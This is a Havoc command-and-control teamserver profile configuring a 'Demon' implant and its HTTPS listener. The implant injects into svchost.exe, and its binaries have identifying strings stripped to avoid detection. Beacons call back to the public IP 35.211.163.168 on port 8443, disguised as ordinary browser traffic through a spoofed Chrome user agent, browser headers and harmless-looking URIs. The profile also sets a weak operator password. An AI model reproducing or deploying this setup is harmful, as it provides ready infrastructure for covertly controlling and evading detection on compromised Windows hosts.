Teamserver {
    Host = "127.0.0.1"
    Port = 40056

    Build {
        Compiler64 = "teamserver/data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "teamserver/data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
        Nasm       = "/usr/bin/nasm"
    }
}

Operators {
    user "kali" {
        Password = "123455"
    }
}

Demon {
    Sleep  = 2
    Jitter = 40

    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\svchost.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\svchost.exe"
    }
	
    Binary {
        ReplaceStrings-x64 = {
            "demon.x64.dll": "",
            "This program cannot be run in DOS mode.": "",
        }

        ReplaceStrings-x86 = {
            "demon.x86.dll": "",
            "This program cannot be run in DOS mode.": "",
        }
    }
}

Listeners {
    Http {
        Name         = "Agent Listener - HTTP/s"
        Hosts        = ["35.211.163.168"]
        HostBind     = "127.0.0.1"
        PortBind     = 8443
        PortConn     = 8443
        HostRotation = "round-robin"
        Secure       = true
        UserAgent    = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"

        Cert {
            Cert = "cert.pem"
            Key  = "key.pem"
        }

        Uris = [
            "/index.html",
            "/robots.txt",
            "/favicon.ico",
            "/style.css"
        ]

        Headers = [
            "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
            "Accept-Language: en-US,en;q=0.9",
            "Accept-Encoding: gzip, deflate, br",
            "Connection: keep-alive",
        ]

        Response {
            Headers = [
                "Keep-Alive: timeout=65",
                "Connection: keep-alive"
            ]
        }
    }
}
